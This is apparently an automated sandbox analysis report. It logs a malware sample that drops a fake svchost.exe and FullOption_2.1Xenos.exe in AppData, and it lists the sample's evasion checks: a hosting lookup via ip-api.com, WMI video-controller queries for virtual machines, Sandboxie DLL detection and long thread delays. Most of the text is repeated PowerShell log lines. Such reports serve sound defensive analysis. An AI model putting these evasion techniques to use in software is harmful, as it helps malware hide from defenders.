                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Check if machine is in data center or colocation facility
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: svchost.exe, 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: FullOption_2.1Xenos.exe, 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL?1BACBVD8VOSDNODQXYKYKOXGCYB3L4H?XCITP4RXVNDTI8LNZ5A14XDDTULYW2Q?QDU75J9E9ZOPQDKVOU2JYVBLVNBFALY?OOXPU559F4RWTSRV9EANW2ZO42GGH6W?DE1LG4YYVDX7NM9MHXPCIRR0LERTDOU?OTLGKTGYHLIUQO0VTPBJ9O2BJMSFQVS?MLQ8RHEN8WZC8Y9O8CUQEPKAJPFIR1M?GHQBU1PKCTUDZX8N6DUED1SCBUXPWCE?CBIQBXJ8NGHLEGU7NZU2CWP5KVXJ3LO
                Source: file.exe, 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, svchost.exe.0.drBinary or memory string: SBIEDLL.DLLEF2TM6EI7BFXPX3GLXOMH4VTAFPF20UKO0S73JUDVEV21Q32MTBELASD866LCU32CDJRMIP4DNZ0LZIJKVPVQNIBFKIYYEEP71OXOXELM4CSZ9WVZ3RA4CY8B4ME4J9B5CQAQMV9URHZ2Z3MAGWCEW1RYEDD1H7NYCW4BJZSAKWQPX2HQWDYG5OBASDJF2SY1KSVU3YBIJA3ECZEKCEFQ6ZCWIRFABI3IONFL6UXQDRQCJ1UAS1DP0TC2MJ1JNJE2ELMCPVARDWIHP8IKOFNBZ2TR6I9W6FWDSOGT0MAHXXMJ48DOCEFDHMCSSZZV5H397082KZCSPSXDN5NOEMU08DND9LLCL4NCKLS4
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 11E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 1AC80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeMemory allocated: C40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeMemory allocated: 1A7F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2E00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1AE00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeMemory allocated: 1330000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeMemory allocated: 1AE40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1ACC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1370000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1AEA0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 32F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1B2F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 13E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 32C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1B2C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 8792Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 1037Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7134Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2535Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6955
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2648
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6795
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2824
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7896
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1689
                Source: C:\Users\user\Desktop\file.exe TID: 5980Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe TID: 6780Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3892Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe TID: 6856Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2036Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4472Thread sleep count: 6955 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572Thread sleep count: 2648 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5876Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 312Thread sleep count: 6795 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 312Thread sleep count: 2824 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1368Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4916Thread sleep count: 7896 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320Thread sleep count: 1689 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6752Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 1004Thread sleep time: -922337203685477s >= -30000s
